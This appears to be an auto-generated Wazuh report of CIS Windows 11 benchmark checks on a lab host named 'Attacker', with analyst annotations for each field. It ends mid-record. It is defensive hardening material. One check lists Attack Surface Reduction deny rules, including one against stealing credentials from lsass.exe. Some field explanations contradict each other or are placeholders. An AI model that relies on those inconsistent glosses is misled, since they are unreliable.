CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.053+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.053+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.45.1']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2601768
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26316
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow Message Service Cloud Sync' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows backup and restore of cellular text messages to Microsoft's cloud services. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In a high security environment, data should never be sent to any 3rd party since this data could contain sensitive information.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Messaging\Allow Message Service Cloud Sync. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Messaging.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.45.1
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.pci_dss:  4.1
PCI DSS requirement the check maps to (v3.2.1 numbering; 4.1 = strong cryptography for cardholder data sent over open networks).

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
HIPAA Security Rule technical safeguards (45 CFR 164.312): (a)(2)(iv) encryption and decryption, (e)(1) transmission security, (e)(2)(i) integrity controls, (e)(2)(ii) encryption in transit.

data.sca.check.compliance.nist_800_53:  SC.8
NIST SP 800‑53 control mapping; SC‑8 is transmission confidentiality and integrity.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Messaging']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  failed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.069+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.069+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.46.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.3']
CIS Critical Security Controls mapping (control.safeguard); the CSC version is not stated in the alert.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2604945
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26317
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This setting determines whether applications and services on the device can utilize new consumer Microsoft account authentication via the Windows OnlineID and WebAccountManager APIs. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Organizations that want to effectively implement identity management policies and maintain firm control of what accounts are used on their computers will probably want to block Microsoft accounts. Organizations may also need to block Microsoft accounts in order to meet the requirements of compliance standards that apply to their information systems.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft accounts\Block all consumer Microsoft account user authentication. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template MSAPolicy.admx/adml that is included with the Microsoft Windows 10 Release 1703 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.46.1
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.cis_csc:  5.3
CIS Critical Security Controls mapping (control.safeguard); the CSC version is not stated in the alert.

data.sca.check.compliance.pci_dss:  8.1
PCI DSS requirement the check maps to (v3.2.1 numbering; 8.1 = user identification management).

data.sca.check.compliance.tsc:  CC6.1
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\MicrosoftAccount']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  failed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.084+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.084+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.4.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2608665
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26318
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting configures a local override for the configuration to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. This setting can only be set by Group Policy. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The decision on whether or not to participate in Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service for malicious software reporting should be made centrally in an enterprise managed environment, so that all computers within it behave consistently in that regard. Configuring this setting to Disabled ensures that the decision remains centrally managed.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Configure local setting override for reporting to Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.100+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.100+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Join Microsoft MAPS' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.4.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2612831
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26319
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Join Microsoft MAPS' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to join Microsoft Active Protection Service (MAPS), which Microsoft renamed to Windows Defender Antivirus Cloud Protection Service and then Microsoft Defender Antivirus Cloud Protection Service. Microsoft MAPS / Microsoft Defender Antivirus Cloud Protection Service is the online community that helps you choose how to respond to potential threats. The community also helps stop the spread of new malicious software infections. You can choose to send basic or additional information about detected software. Additional information helps Microsoft create new definitions and help it to protect your computer. Possible options are: - (0x0) Disabled (default) - (0x1) Basic membership - (0x2) Advanced membership Basic membership will send basic information to Microsoft about software that has been detected including where the software came from the actions that you apply or that are applied automatically and whether the actions were successful. Advanced membership in addition to basic information will send more information to Microsoft about malicious software spyware and potentially unwanted software including the location of the software file names how the software operates and how it has impacted your computer. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The information that would be sent can include things like location of detected items on your computer if harmful software was removed. The information would be automatically collected and sent. In some instances personal information might unintentionally be sent to Microsoft. However, Microsoft states that it will not use this information to identify you or contact you. For privacy reasons in high security environments, it is best to prevent these data submissions altogether.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\MAPS\Join Microsoft MAPS. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.4.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.131+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.5.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2618728
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26321
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting sets the Attack Surface Reduction rules. The recommended state for this setting is: 26190899-1602-49e8-8b27-eb1d0a1ce869 - 1 (Block Office communication application from creating child processes) 3b576869-a4ec-4529-8536-b80a7769e899 - 1 (Block Office applications from creating executable content) 5beb7efe-fd9a-4556-801d-275e5ffc04cc - 1 (Block execution of potentially obfuscated scripts) 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 - 1 (Block Office applications from injecting code into other processes) 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c - 1 (Block Adobe Reader from creating child processes) 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b - 1 (Block Win32 API calls from Office macro) 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 - 1 (Block credential stealing from the Windows local security authority subsystem (lsass.exe)) b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 - 1 (Block untrusted and unsigned processes that run from USB) be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 - 1 (Block executable content from email client and webmail) d3e037e1-3eb8-44c8-a917-57927947596d - 1 (Block JavaScript or VBScript from launching downloaded executable content) d4f940ab-401b-4efc-aadc-ad5f3c50688a - 1 (Block Office applications from creating child processes) e6db77e5-3df2-4cf1-b95a-636979351e5b - 1 (Block persistence through WMI event subscription) Note: More information on ASR rules can be found at the following link: Use Attack surface reduction rules to prevent malware infection | Microsoft Docs
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Attack surface reduction helps prevent actions and apps that are typically used by exploit-seeking malware to infect machines.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path so that 26190899-1602-49e8-8b27-eb1d0a1ce869, 3b576869-a4ec-4529-8536-b80a7769e899, 5beb7efe-fd9a-4556-801d-275e5ffc04cc, 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84, 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c, 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2, b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4, be9ba2d9-53ea-4cdc-84e5-9b1eeee46550, d3e037e1-3eb8-44c8-a917-57927947596d, d4f940ab-401b-4efc-aadc-ad5f3c50688a, and e6db77e5-3df2-4cf1-b95a-636979351e5b are each set to a value of 1: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction\Configure Attack Surface Reduction rules: Set the state for each ASR rule. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.5.1.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.195+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.195+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2629197
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26325
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off real-time protection' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting configures real-time protection prompts for known malware detection. Microsoft Defender Antivirus alerts you when malware or potentially unwanted software attempts to install itself or to run on your computer. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

